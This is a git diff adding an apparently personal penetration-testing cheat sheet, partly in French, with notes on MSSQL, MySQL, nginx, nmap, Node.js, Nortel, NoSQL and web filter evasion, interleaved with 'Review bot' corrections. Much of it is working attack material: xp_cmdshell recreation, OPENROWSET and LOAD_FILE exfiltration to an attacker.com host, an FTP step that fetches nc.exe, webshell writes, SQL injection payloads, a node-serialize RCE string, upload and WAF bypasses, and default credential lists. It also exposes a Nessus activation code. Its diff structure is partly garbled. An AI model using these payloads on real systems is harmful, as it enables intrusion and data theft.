+ If the previous code does not work, it means that the xp_log70.dll has been moved or deleted. In this case we need to inject the following code:
+
+ CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS
+ DECLARE @result int, @OLEResult int, @RunResult int
+ DECLARE @ShellID int
+ EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
+ IF @OLEResult <> 0 SELECT @result = @OLEResult
+ IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)
+ EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
+ IF @OLEResult <> 0 SELECT @result = @OLEResult
+ IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)
+ EXECUTE @OLEResult = sp_OADestroy @ShellID
+ return @result
+http://xd-blog.com.ar/descargas/manuales/bugs/full-mssql-injection-pwnage.html
+
+# command exec without xp_cmdshell with agent jobs
+https://www.optiv.com/blog/mssql-agent-jobs-for-command-execution
+
+# OPENROWSET
+# http://codewhitesec.blogspot.com.au/2015/06/reading-and-writing-files-with-mssql-openrowset.html
+si on n'est pas sysadmin
+* first make sure openrowset is enabled with 'ad hoc distributed queries'
+select * from OpenRowSet('SQLOLEDB','Network=DBMSSOCN;Address=yespapa.d2t.attacker.com;uid=sa;pwd=','exec master..xp_msver')
+* exfiltration
+blah');INSERT INTO OPENROWSET('SQLOLEDB','';'sa';'1dhw753',output_db.dbo.output) SELECT @@version;--
+* read local file
+create table #output (output varchar(255) null);insert #output exec xp_cmdshell 'dir C:\'; INSERT INTO OPENROWSET('SQLOLEDB','';'sa';'1dhw753',output_db.dbo.output) select * from #output where output is not null; drop table #output
+* copying entire db etc.
+http://www.secforce.com/blog/2013/01/stacked-based-mssql-blind-injection-bypass-methodology/
+* can also do password guessing attack against a sysadmin to be able to xp_cmdshell
+select * from OpenRowSet('SQLOLEDB','Network=DBMSSOCN;Address=;uid=sa;pwd=','select 1337')
+
+# abusing users that have been granted impersonate permissions to switch to sa or DAs
+https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/
+
+# upload file
+exec master..xp_cmdshell 'echo open ftp.tester.org > ftpscript.txt';--
+exec master..xp_cmdshell 'echo USER >> ftpscript.txt';--
+exec master..xp_cmdshell 'echo PASS >> ftpscript.txt';--
+exec master..xp_cmdshell 'echo bin >> ftpscript.txt';--
+exec master..xp_cmdshell 'echo get nc.exe >> ftpscript.txt';--
+exec master..xp_cmdshell 'echo quit >> ftpscript.txt';--
+exec master..xp_cmdshell 'ftp -n -s:ftpscript.txt';--
+
+# export table to file
+exec xp_cmdshell 'bcp "select * from db.dbo.tablename" queryout "c:\windows\temp\blah.txt" -c -T'
+
+# tricks
+https://www.netspi.com/blog/entryid/228/locate-and-attack-domain-sql-servers-without-scanning
+http://www.casaba.com/blog/2013/05/sql-server-now-with-reflective-dllexe-injection/
+https://www.netspi.com/blog/entryid/197/how-to-hack-database-links-in-sql-server
+https://www.netspi.com/blog/entryid/221/decrypting-mssql-database-link-server-passwords
+https://blog.netspi.com/decrypting-mssql-credential-passwords/
+
+# mitm
+https://gist.github.com/thinkst/db909e3a41c5cb07d43f (http://blog.thinkst.com/2015/11/stripping-encryption-from-microsoft-sql.html) # downgrade to strip encryption
+https://www.optiv.com/blog/mssql-agent-jobs-for-command-execution
+
+# sqlmap notes
+il fallait que j'enleve le cast(@@version AS NVARCHAR(4000)) de son payload pour que ca passe
+
+# evasion
+mssql allow chars from 01-1f to be used as whitespaces
+iis+asp parameter pollution inserts , need to use /**/ like .aspx?iid='; /*&iid=1*/ EXEC /*&iid=1*/ master..xp_cmdshell /*&iid=1*/ "ping 10.1.1.3" /*&iid=1*/ -- => '; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ "ping 10.1.1.3" /*,1*/ --
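Review bot: The modes under `# hashcat mssql` do not match the hash layout described just above them: in oclHashcat-plus `-m 2500` is WPA/WPA2, while the MSSQL modes are `-m 131` (MSSQL 2000, the `0x0100 salt sha1 sha1` form shown) and `-m 132` (MSSQL 2005, single SHA1), with `-m 1731` for 2012+; the `-lite -m 1300` line presumably comes from lite's own numbering and should be re-checked before it is relied on. Separately, the single-user-mode recipe creates `hero` with `CHECK_POLICY=OFF` and a trivial password, which on an engagement is a persistent sysadmin backdoor, so the sheet should end that section with `DROP LOGIN hero` and a reminder to restore the original `LoginMode` value once done.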
diff --git a/Cheat Sheet/mtu b/Cheat Sheet/mtu
new file mode 100644
index 0000000..62b82c5
--- /dev/null
+++ b/Cheat Sheet/mtu
@@ -0,0 +1,8 @@
+# mtu
+
+# pour faire ppp over FreeWifi, il faut diminuer le MTU de son interface wifi
+ifconfig <[ae]thX> mtu 1400
+
+# iproute2
+ip link set dev tun0 mtu 296
+
diff --git a/Cheat Sheet/mutt b/Cheat Sheet/mutt
new file mode 100644
index 0000000..76fc93d
--- /dev/null
+++ b/Cheat Sheet/mutt
@@ -0,0 +1,28 @@
+# mutt
+
+# pour ouvrir les PDF dans Kpdf depuis mutt, j'ai ajouté la ligne suivante dans mon ~/.mailcap
+application/pdf; kpdf %s
+
+# mais bizarrement il n'est pas lu, donc j'ai ajouté cette ligne dans /etc/mailcap et là ça marche.
+
+# search
+/~b blahblah
+
+# to_chars
++ email not addressed to your address
+T I am the only recipient
+C I am in To: but not alone
+F I am in CC: but not alone
+L sent to a mailing list I suscribed to
+
+# fedora mutt + patch sidebar
+j'ai recuperer le srpm officiel du packet mutt avec yumdownloader --source mutt # downloads mutt-1.5.21-20.fc19.src.rpm
+j'ai extrait le rpm
+j'ai ajoute le patch sidebar dans le mutt.spec
+j'ai supprime les lignes du patch sidebar qui modifiait le configure.ac pk ca faisait foirer un autre patch
+j'ai contruit le .rpm et le .src.rpm, ils sont dans bak sur kool
+
+# convert *.eml files to maildir
+mkdir -vp /tmp/inbox/{cur,new,tmp}
+for i in *.eml; do cat "$i" | getmail_maildir /tmp/inbox; done
+mutt -R -m mailbox -f /tmp/inbox/
diff --git a/Cheat Sheet/mysql b/Cheat Sheet/mysql
new file mode 100644
index 0000000..e3b638f
--- /dev/null
+++ b/Cheat Sheet/mysql
@@ -0,0 +1,121 @@
+# mysql
+
+# auth bypass
+https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
+for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
+auxiliary/scanner/mysql/mysql_authbypass_hashdump
+
+# common tricks
+select user(),database(),version(),@@datadir,5
+select load_file('/etc/passwd') or SELECT CAST(load_file( '/etc/apache2/sites-enabled/000-default') AS char)
+select "",2,3,4 INTO OUTFILE "/var/www/html/temp/webshell.php" -- # or use eval()
+
+# multibyte to bypass mysql-real-escape-string (db driver and db don't talk same charset) http://security.stackexchange.com/questions/9908/multibyte-character-exploits-php-mysql
+login=%bf%27+or+1=1%23 (?)
+login=%a5%27+or+1=1%23 (shift-js) 0xa5 becomes \ when encoded as shift-jis so it will escape the \ inserted by mysql_real_escape_string: 'where color="%s"' % u'blue\u00a5" or 1#'.encode('shift-jis') -> where color="blue\\" or 1#"
+
+# leet tips
+mysql allow chars from 09, 0A-0D, A0 to be used as whitespaces
+mysql utf-8 collation ('Ä' is equal 'a') can bypass php checks: 'orÄnge' will bypass "if ($username === 'orange')"
+select 1,info from information_schema.processlist # afficher la requete SQL
+and 1=1 procedure analyse() # afficher les noms des colonnes du select
+evade IDS with information_schema.{key_column_usage,table_constraints,statistics,partitions}
+select -> select%23randomText%0A and user() -> user%23randomText%0A() # see sqlmap tamper scripts
+select X'31333337' == select 0x31333337
+comments: /*!50000union*/ /*!50000all*/ /*!50000select*/ group_concat(table_name) /*!50000from*/ information_schema.tables
+no space: (select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))
+
+# group_concat to get everything in one line and one column
+select group_concat(schema_name separator 0x2c) from information_schema.schemata;
+select group_concat(table_name,0x2e,column_name,0x0a) from information_schema.columns where table_schema='sqlilabs';
+
+# injection in insert, update, delete statements
+http://dl.packetstormsecurity.net/papers/database/SQLi_Insert.pdf
+DELETE FROM users WHERE id=1 or (SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a) or '';
+INSERT INTO users (id, username, password) VALUES (1,'Olivia ' or (SELECT * FROM (SELECT name_const((SELECT 2),1),name_const((SELECT 2),1))a) or '', 'Nervo');
+INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT 1 FROM (SELECT count(*),concat((SELECT (SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or '', 'Nervo'); # double query injection
+
+# injection in limit (can't have union after order by see http://raijee1337.blogspot.com.au/2015/07/bypassing-incorrect-usage-of-union-and-order-by.html)
+LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
+https://rdot.org/forum/showpost.php?p=36186&postcount=30
+
+# union based
+fr' order by 1--%20
+fr' union select 'a','b'# # trouver le type de chaque colonne (chaine, entier, date, ...)
+fr' union select @@version,'b'/* # trouver le numero de version
+
+select 'a',table_name from information_schema.tables # lister les tables de la base
+select 'a',column_name from information_schema.columns where table_name='accounts' # lister les colonnes
+select user,password from mysql.users # lire le contenu des tables
+select concat_ws(0x3a,host,user,password) from user # concatener
+
+# error based
+lang=fr' AND (select 1 from (select count(*), concat(0x3a64616a3a,(select version()),0x3a64616a3a,floor(rand(0)*2))as a from information_schema.tables group by a)x) AND 'a'='a # also see double query injection
+lang=fr' AND (select 1 from (select count(*), concat(0x3a64616a3a,(select version()),0x3a64616a3a,floor(rand(0)*2))as a from information_schema.tables group by a)x limit 0,1) AND 'a'='a # if subquery returns more than 1 row
+?id=0 or updatexml(1,concat(0x7e,(version())),0) or
+?id=0 or extractvalue('',concat("/",(select version())))
+?id=0 or extractvalue(null,concat(0x3a,version()))
+?id=0 or (select*from(select(name_const(version(),1)),name_const(version(),1))a) or
+?id=0 or (select 1 REGEXP if(1=1,'+','.'))
+
+# time blind based
+lang=en' and benchmark(20000000,sha1(1))
+lang=en' AND SLEEP(5)
+lang=existe_pas' OR sleep(2) # will sleep 2 seconds for each record
+
+dbms=mysql&id=1+and+IF((ASCII(SUBSTR((SELECT+1337),${char_index:1},1))${comparator:>}${char_val:0}),SLEEP(2),1)
+
+# turn time based into boolean based
+select 1 REGEXP IF(1=[12],'+','.'); // same with rlike
+select extractvalue('', if(1=[12],'','/')); // may work with other xml functions like updatexml etc.
+select (case when (1=1) then 1 else 1*(select 1 from information_schema.character_sets) end)
+
+# outband
+?id=0 or (SELECT LOAD_FILE(CONCAT(,(SELECT password FROM mysql.user WHERE user=root LIMIT 1),.attacker.com)) ...
+
+# Auditing
+mysqlaudit.py
+
+* recuperer fichier de configuration
+le my.cnf réellement utilisé (verifier avec lsof ou ps fauxww)
+
+* si configuration avec replication
+- sur le master
+show master status;
+- sur chaque slave
+show slave status\G
+
+* verifier que les fichiers log ne sont pas vides
+
+# usage
+* creer une table
+create table blah (id int(11) not null, libelle varchar(30));
+insert into blah (id, libelle) values (1, 'blah');
+
+* creer/supprimer un utilisateur (mieux vaut toujours preciser le host car c'est @'%' par defaut sinon)
+GRANT ALL PRIVILEGES ON mabdd.* TO 'monty'@'localhost' identified by 'p@ssw0rd';
+GRANT select,update on mabdd.* TO 'monty'@'localhost' identified by 'some_password';
+DROP USER 'monty'@'localhost';
+CREATE USER 'monty'@'localhost' IDENTIFIED BY 'some_password';
+FLUSH PRIVILEGES;
+
+# Password cracking
+http://www.tobtu.com/mysql323.php # old mysql hash
+
+# gui
+https://www.mysql.com/products/workbench/
+
+# optimization
+http://websec.ca/blog/view/optimized_blind_sql_injection_data_retrieval
+http://blog.k3170makan.com/2013/10/even-faster-blind-sql-injection-methods.html
+http://ha.xxor.se/2011/06/speeding-up-blind-sql-injections-using.html
+
+# code exec
+udf (sqlmap or https://github.com/hatRiot/sql3_udf)
+
+# recover root pw
+http://www.percona.com/blog/2014/12/10/recover-mysql-root-password-without-restarting-mysql-no-downtime/
+
+# rdot advanced tricks
+https://rdot.org/forum/showthread.php?p=37133
+https://rdot.org/forum/showthread.php?t=3167
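Review bot: `select user,password from mysql.users` under `# union based` names a table that does not exist — the grant table is `mysql.user`, as the `concat_ws` line right below it and the outband example already use — so it should read `select user,password from mysql.user`. A one-line caveat there that MySQL 5.7+ keeps the hash in `authentication_string` rather than `password` would save a failed query on newer targets. The outband line has lost its string literals (the UNC prefix before the subquery and the share name after `.attacker.com`), so it cannot be pasted as-is and needs the quoted parts restored.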
diff --git a/Cheat Sheet/nat-pmp b/Cheat Sheet/nat-pmp
new file mode 100644
index 0000000..2d5bed4
--- /dev/null
+++ b/Cheat Sheet/nat-pmp
@@ -0,0 +1,4 @@
+# nat-pmp
+
+https://community.rapid7.com/community/metasploit/blog/2014/10/21/r7-2014-17-nat-pmp-implementation-and-configuration-vulnerabilities
+udp port 5351
diff --git a/Cheat Sheet/nessus b/Cheat Sheet/nessus
new file mode 100644
index 0000000..dfac7ea
--- /dev/null
+++ b/Cheat Sheet/nessus
@@ -0,0 +1,7 @@
+# nessus
+
+# code utilisé pour net-analyzer/nessus-bin-4.0.2-r100
+F082-CFF7-01FE-E96E-EF95
+
+# issues with recommendations
+http://static.tenable.com/documentation/reports/html/PCI_Scan_Hosts_Exec_w_Remediations.html
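Review bot: The line under `# code utilisé pour net-analyzer/nessus-bin-4.0.2-r100` commits a Nessus activation code to the repository in clear; anyone who can read the repo can consume or get it revoked, and it remains in git history even after the line is deleted. Move it to a local secrets store and keep only a pointer here, e.g. `# activation code: see password-manager entry "nessus-4.0.2"`.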
diff --git a/Cheat Sheet/netsupport b/Cheat Sheet/netsupport
new file mode 100644
index 0000000..cd52097
--- /dev/null
+++ b/Cheat Sheet/netsupport
@@ -0,0 +1,5 @@
+# netsupport
+
+https://www.trustwave.com/Resources/SpiderLabs-Blog/An-Intro-to-NetSupport-Manager-Scripts/
+https://www.trustwave.com/Resources/SpiderLabs-Blog/NetSupport-Information-Leakage-Using-Nmap-Script/
+https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2014-006/
diff --git a/Cheat Sheet/nginx b/Cheat Sheet/nginx
new file mode 100644
index 0000000..b717c21
--- /dev/null
+++ b/Cheat Sheet/nginx
@@ -0,0 +1,18 @@
+# nginx
+
+# 2010, discovered by 80sec.com
+http://blah/uploads/hacker.png/x.php
+if not configured properly, will be interpreted as PHP code
+
+echo "" > shell.php
+$ exiftool "-comment<=shell.php" malicious.png # use strings to make sure all's good (http://www.sno.phy.queensu.ca/~phil/exiftool/index.html)
+http://blah/uploads/136991823.png/c.php?c=uname%20-a
+
+# vulns
+* Request line parsing vulnerability (CVE-2013-4547)
+http://mailman.nginx.org/pipermail/nginx-announce/2013/000125.html
+nginx 0.8.41 through 1.4.3 and 1.5.x before 1.5.7 allows remote attackers to bypass intended restrictions via an unescaped space character in a URI.
+
+* (CVE-2013-2070)
+http://mailman.nginx.org/pipermail/nginx-announce/2013/000114.html
+A memory disclosure vulnerability is present in nginx versions 1.1.4 to 1.2.8 and 1.3.0 to 1.4.0. The vulnerability is present if proxy_pass to untrusted upstream HTTP servers is used. The vulnerability could also lead to a denial of service.
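Review bot: `echo "" > shell.php` writes an empty file, so the following `exiftool "-comment<=shell.php" malicious.png` embeds nothing — the PHP payload appears to have been lost from the note (most likely stripped together with its angle brackets) and needs restoring before this recipe works. The `/uploads/x.png/x.php` trick would also be easier to report with its root cause and fix recorded: PHP-FPM with `cgi.fix_pathinfo=1` walks back to the nearest existing file when nginx forwards the full URI as `SCRIPT_FILENAME`, and the usual mitigation is `cgi.fix_pathinfo=0` or a `try_files $uri =404;` guard in the PHP location block. That is the commonly cited explanation for the 80sec finding; confirm against the target's fastcgi_params before writing it up.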
diff --git a/Cheat Sheet/nmap b/Cheat Sheet/nmap
new file mode 100644
index 0000000..549d3c8
--- /dev/null
+++ b/Cheat Sheet/nmap
@@ -0,0 +1,68 @@
+# nmap
+
+# nse (Nmap Scripting Engine)
+hsc newsletter dec 2k8
+
+# psexec
+nmap 1.2.3.4 --script smb-psexec --script-args=config=network,smbuser=administrator,smbpass=Password1
+
+# fyodor talk at defon 16 (2008)
+== firewall ==
+best against stateful firewall: send a SYN probe
+$ nmap -sP -PS80 sun.com
+best against stateless firewall: send an ACK probe
+$ nmap -sP -PA80 sun.com
+
+== TCP and IP header options ==
+--ip-options "L 10.0.0.2" (source routing)
+
+== More effective host discovery ==
+- send both SYN and ACK probes!
+- send UDP probe, if port is closed => target is alive
+- when ping/echo is blocked, try an other ICMP probe
+
+-sP -PE -PP -PS21,22,23,... -PA80,113,... --source-port 53 (masquarade DNS)
+-PU
+
+== Top ports ==
+nmap now scans the top 1000 ports for each protocol
+UDP scan much quicker (13 seconds): nmap -sUV -F -T4 --version-intensify 0
+--top-ports [...|500|1000|2000|...] (default is 1000)
+ tcp: top 3674 ports is 100% effective
+ udp: top 1017 ports is 100% effective
+top 10 is:
+ tcp: 80, 23, 22, 443, 3389, 445, 139, 21, 135, 25
+ udp: 137 (netbios-ns) 161 (snmp) 1434 (ms-sql-m) 123 (ntp) 138 (netbios-dgm) 445 (ms-ds) 135 (msrpc) 67 (dhcps) 139 (netbios-ssn) 53 (domain)
+
+== Timing ==
+--min-rate --max-rate (packets per second: just go the speed i say, do not bother with probes being dropped)
+--max-scan-delay (solaris responds with 1 ICMP message per second)
+--min-hostgroup
+--max_rtt_timeout --initial_rtt_timeout (traceroute)
+
+== helpers ==
+--reason (syn-ack or reset)
+-oA mylog-%T-%D (time & date)
+
+== ncat ==
+"netcat improved"
+connection brokerin? (bypassing NATs)
+
+# top ports
+grep -v '^#' /usr/share/nmap/nmap-services | awk -F' ' '{print $3" "$2" "$1}' | sort -nr | head -n 100
+
+# more effective ping scan
+-sn (formerly known as -sP) by default does: -PE -PS443 -PA80 -PP
+more advanced;
+-PE # icmp echo
+-PS80,23,22,443,3389,445,139,21,135,25 # top 10 most common ports
+-PA80 # send ack
+-PP # icmp timestamp
+-PU # send udp packet to 40125/udp, machine is up if ICMP port unreachable
+
+# jdwp
+nmap -v -iL targets.txt -p8000,8787,8788,9009,7777,8453,5005,3999,5000,18000,9001 -Pn
+
+# ultimate cmd line
+nmap -v -iL targets.txt -PE -PS80,23,22,443,3389,445,139,21,135,25 -PA80 -PP -PU -T4 -sV --reason
+
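Review bot: `--version-intensify 0` in the fast UDP scan line is not an nmap option and makes the command fail to parse; the flag is `--version-intensity 0` (equivalently `--version-light`). The smb-psexec example passes `smbpass=Password1` on the command line, where it lands in shell history and `ps` output; the sheet could note `--script-args-file` or `smbhash=` as the quieter alternatives. In the ping-scan section, `--source-port 53 (masquarade DNS)` should read `masquerade`.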
diff --git a/Cheat Sheet/nodejs b/Cheat Sheet/nodejs
new file mode 100644
index 0000000..8c453be
--- /dev/null
+++ b/Cheat Sheet/nodejs
@@ -0,0 +1,9 @@
+# nodejs
+
+# rce in mathjs
+https://capacitorset.github.io/mathjs/
+
+# vuln unserialize() in node-serialize
+https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
+{"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('bash -c \"bash ...\"')}()"}
+
diff --git a/Cheat Sheet/nortel b/Cheat Sheet/nortel
new file mode 100644
index 0000000..3b11c28
--- /dev/null
+++ b/Cheat Sheet/nortel
@@ -0,0 +1,38 @@
+# nortel
+
+# default creds
+ Model | Username Password
+------------------------------------------------+---------------+-----------------
+Meridian Link | disttech | 4tas
+Meridian Link | maint | maint
+Meridian Link | mlusr | mlusr
+Remote Office 9150 | admin | root
+Accelar (Passport) 1000 series routing switches | l2 | l2
+Accelar (Passport) 1000 series routing switches | l3 | l3
+Accelar (Passport) 1000 series routing switches | ro | ro
+Accelar (Passport) 1000 series routing switches | rw | rw
+Accelar (Passport) 1000 series routing switches | rwa | rwa
+Extranet Switches | admin | setup
+Baystack 350-24T | n/a | secure
+Meridian PBX | login | 0
+Meridian PBX | login | 1111
+Meridian PBX | login | 8429
+Meridian PBX | spcl | 0
+Meridian MAX | service | smile
+Meridian MAX | root | 3ep5w2u
+Matra 6501 PBX | (none) | 0
+Meridian MAX | maint | ntacdmax
+Meridian CCR | service | smile
+Meridian CCR | disttech | 4tas
+Meridian CCR | maint | maint
+Meridian CCR | ccrusr | ccrusr
+Meridian | n/a | (none)
+Meridian Link | service | smile
+Contivity Extranet/VPN switches | admin | setup
+dms | n/a | (none)
+Business Communications Manager 3.5 and 3.6 | supervisor | PlsChgMe
+Phone System All | n/a | 266344
+Norstar | 266344 | 266344
+p8600 | n/a | (none)
+VPN Gateway | admin | admin
+Passport 2430 | Manager | (none)
diff --git a/Cheat Sheet/nosql b/Cheat Sheet/nosql
new file mode 100644
index 0000000..c3feaaa
--- /dev/null
+++ b/Cheat Sheet/nosql
@@ -0,0 +1,31 @@
+# nosql
+
+As opposed to SQL databases who almost all support the same syntax, NoSQL databases have different syntax.
+
+# tools
+https://www.reddit.com/r/netsec/comments/3g4mr2/nosql_exploitation_framework_v20/
+
+# MongoDB
+ SQL | NoSQL
+true condition: or 1=1 | || 1==1
+comment: | NULL BYTE, //,
+
+* server side template injection (ssti)
+http://blog.portswigger.net/2015/08/server-side-template-injection.html
+http://blog.orange.tw/2016/04/bug-bounty-uber-ubercom-remote-code_7.html
+https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
+{{7*7}}
+
+* expression language injection
+${777-111} #{777-111} %{777-111}
+see ./java
+
+* code injection
+search.php?q={${phpinfo()}} // http://secalert.net/#ebay-rce-ccs
+try echo pi in case input is eval'd by PHP app
+in PHP usort: ?order=id);}system('uname%20-a');//
+in PHP assert: ?vuln=hacker'.phpinfo().' -> assert('hacker'.phpinfo().'
+
+* OS command injection
+try commands that don't return any output or only return one word: sleep/ping/pwd/whoami
+or get output through out-of-band
+or ip=127.0.0.1%0a`id`>/var/www/public/results.txt
+
+* xml, xpath, ldap injection
+see ./twahh
+
+* SMTP
+%0aCc:
+%0d%0aBcc:
+%0aDATA%0afoo%0a%2e%0aMAIL+FROM:...
+
+* upload
+change extension to .php[3-7], .phtml, .pht, .php.xyz, .xhtml, .shtml, .stm. .shtm, ..., .html, .htm, .htt, .mht, .thtml, .svg, .xml
+upload lol.php.csv
+upload .htaccess to enable another allowed extension to be run by PHP
+upload evil.php with Content-Type: image/jpg in case app checks the MIME type
+upload evil.jpg with PHP code inside image
+upload evil.png acess uploads/evil.png/x.php (see ./nginx)
+upload imagetragick (im relies on the magic header so even if app checks extension you can upload a .mvg or .svg file as evil.png)
+
+* passive scanning
+parse image responses for sql errors, path/ip disclosures etc.
+
+* path traversal / LFI
+try ../ then ../../ then ../../../ (can get an error on first 2 but success on 3rd)
+....// (evasion, more below)
+
+* randomness
+crack seed https://github.com/altf4/untwister
+
+* iis
+http://srv/web/blah\..\jobMail.asp
+
+* inter-protocol exploitation
+e.g. server does not sanitize dns response from attacker's domain => xss, sqli, rce ...
+
+* heartbleed
+ESX & ESXi are vuln
+
+* dos
+hashtable collisions (http://www.phpinternalsbook.com/hashtables/hash_algorithm.html)
+php CVE-2018-5711 + gif upload
+
+# filter evasion
+always be aware that filters and weird setups can alter your inputs,
+cap strings, add stuff to them, replace/remove characters and so on.
+windows: change case, use 8.3 file/dir names, insert unsupported chars (<, : etc.) that will be automatically removed
+
+SeLeCt
+selselectect
+%53%45%4c%45%43%54
+%2553%2545%254c%2545%2543%2554
+....//
+etc.
+
+$id = str_replace(' ', '', $id);
+if (!preg_match('/^\d+$/m', $id)) { die(); }
+$id = preg_replace('/^[^\d]+$/', '', $id); // won't replace "a1"
+=> bypass all 3 filters with "1%0A)or(1)%23"
+expl: "0%0a)union/**/select/**/null"
+
+* whitespace
+%09 %0d %0a %20 ...
+add more than one of each type
+
+* url encoding
+s%65lect
+s%2565lect
+s%elect
+
+* multiline regex
+id=123\nPAYLOAD
+
+* comments
+SELECT/*foo*/username,password/*foo*/FROM/*foo*/users
+SEL/*foo*/ECT username,password FR/*foo*/OM users // mysql only
+
+* string concatenation
+MySQL: concat('adm','in')
+Oracle: 'adm'||'in'
+MS-SQL: 'adm'+'in'
+
+exec('sel' + 'ect * fro' + 'm users')
+
+* bypass path filter
+///index.php <- php parse_url() bypass
+/;/index
+
+* alternate IP encoding (https://prezi.com/fffqa6n75gbm/zeronights-2014-hunting-for-top-bounties/)
+127.0.0.1
+2130706433
+0x7f000001
+0x7f.0x0.0x0.0x1
+0177.0000.0000.0001
+ping 010.010.010.010; ping 127.1; ping 0177.1; ping 0x7f.1; ping 0; man inet_aton (You can use/mix decimal/octal/hex, omit some/most octets)
+
+http://425.510.425.510/ dotted decimal with overflow
+http://2852039166/ dotless decimal
+http://7147006462/ dotless decimal with overflow
+http://0xA9.0XFE.0XA9.0XFE/ dotted hexadecimal
+http://0xA9FEA9FE/ dotless hexadecimal
+http://0x41414141A9FEA9FE/ dotless hexadecimal with overflow
+more in Server Side Browsing by @agarri
+
+* utf-7
+def utf7(s): # Illegal but accepted UTF7, useful for some blacklists
+ return ''.join('+%s-' % b64encode('\x00' + c).rstrip('=') for c in s)
+
+* utf-16
+U-FF2e http://graphemica.com/%ef%bc%ae get(u'u\uff2e./flag.txt') (in case "NN" is blacklisted)
+U-012f http://graphemica.com/%c4%ae http://www.fileformat.info/info/unicode/char/012e/index.htm get(u'\u012e\u012e/flag.txt') (in case "N" is blacklisted)
+
+* path traversal
+ URL-encoding | 16-bit unicode-encoding | double URL-encoding | overlong UTF-8 unicode-encoding
+dot %2e | %u002e | %252e | %c0%2e %e0%40%ae %c0ae etc.
+forward slash %2f | %u2215 | %252f | %c0%af %e0%80%af %c0%2f etc.
+backslash %5c | %u2216 | %255c | %c0%5c %c0%80%5c etc.
+null byte %00 | %c0%80
+
+hex(0x80 + ord('/')) -> %c0%af
+
+' = %27 = %c0%a7 = %e0%80%a7 = %f0%80%80%a7
+" = %22 = %c0%a2 = %e0%80%a2 = %f0%80%80%a2
+< = %3c = %c0%bc = %e0%80%bc = %f0%80%80%bc
+; = %3b = %c0%bb = %e0%80%bb = %f0%80%80%bb
+& = %26 = %c0%a6 = %e0%80%a6 = %f0%80%80%a6
+\0= %00 = %c0%80 = %e0%80%80 = %f0%80%80%80
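Review bot: The hunk header `@@ -0,0 +1,31 @@` announces a 31-line file, but 157 added lines follow before the next `diff --git`, so the patch as shown cannot apply; everything from the 32nd added line (the one beginning `+or ip=`) onward appears to belong to a different file whose `diff --git` header is missing, which would also explain why a file named `nosql` carries the whole `# filter evasion` chapter. If that is only an artifact of how the page was rendered the commit is fine, but if the committed patch really looks like this it needs regenerating, and the injection/upload/evasion sections should live in their own sheet with a `see ./…` pointer here, as the file already does with `see ./java` and `see ./twahh`. Separately, the MongoDB table line `comment: | NULL BYTE, //,` ends in a trailing comma, suggesting a lost entry.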
diff --git a/Cheat Sheet/perl b/Cheat Sheet/perl
new file mode 100644
index 0000000..03f0d16
--- /dev/null
+++ b/Cheat Sheet/perl
@@ -0,0 +1,362 @@
+# perl
+
+http://sylvain.lhullier.org/publications/perl.html
+
+perl -e "print '0'x64"
+perl -ne 'chop;@a=split(/;/);print(($a[0]?$a[0]:$a[1]).":".$a[2].":0:0:".$a[3]."::\n");'
+find -type f | xargs cat | perl -ne 'print join("\n", (m|https?://[\w./?&=]+|iog))."\n"'
+
+# doc
+perldoc perlre
+faq.perl.org
+
+# toujours executer avec -w pour avoir les warnings et rendre le langage moins permissif
+#!/usr/bin/perl -w
+use strict; # module ayant pour rôle de rendre la syntaxe Perl plus coercitive (modules pragmatiques: strict, diagnostics, etc)
+
+# contexte
+2 contextes principaux: scalaire et liste
+
+plusieurs contextes scalaire:
+- numérique (addition)
+- chaines de caractères
+- tolérant (ni chaine ni numerique, simplement scalaire)
+
+contexte vide
+"Bonjour"; => on aura un warning
+
+# chaines de caractères: caractères speciaux à protéger avec \
+- entre ":
+$ @ \ "
+- entre ':
+' \
+
+# valeur undef: valeur par defaut d'une variable scalaire non initialisée:
+my $x;
+my $x=undef;
+undef($x);
+=> écrire if(defined($x)) et NON: if ($x!=undef)
+
+# la division avec / est une division réelle: 2/3 => 0.666...
+int($x/$y) # fait une division entiere
+
+length()
+chop($x) supprime et renvoie son dernier caratère
+chomp($x) supprime son dernier caractère si c une fin de ligne
+reverse(), index(), rindex()
+
+substr($v,5,1) = "ation à ";
+$v => "salutation à toi"
+
+# pas de booleens, valeurs scalaires fausses sont:
+- 0
+- "0" ou 'O'
+- "" ou ''
+- undef
+
+égalité == eq
+différence != ne
+infériorité < lt
+supériorité > gt
+inf ou égal <= le
+sup ou égal >= ge
+comparaison <=> cmp
+# cmp => comparaison selon la table ASCII
+
+# toujours entourer les if par des accolades
+
+# print "\$s undefined\n" unless (defined($s)) equivalent à if (!defined($s))
+
+# for, while, until
+last, next, redo
+
+# listes
+(2,'age',"Bonjour $prenom")
+() # liste vide
+(1..10, "${insect}man", 'a'..'z', $debut..$fin)
+@t = ("nom",12);
+(1,2,@t,"aaa",-1) <=> (1,2,("nom",12),"aaa",-1) <=> (1,2,"nom",12,"aaa",-1) # applatissement ou linéarisation
+(2,10) x 3 => (2,10,2,10,2,10)
+($a,@t) = @s; # $a reçoit le 1er element, et @t absorbe tous les autres
+($a,@t,@u,$b) = @s; # idem sauf que @u = () et $b = undef
+
+# tableaux
+my @t = (2,'age',"Bonjour $prenom")
+$t[-1] = "Salut $pseudo"; # modif du dernier element, -2 pour l'avant dernier, etc
+$t[$#t] # idem car $#t est l'indice du dernier element
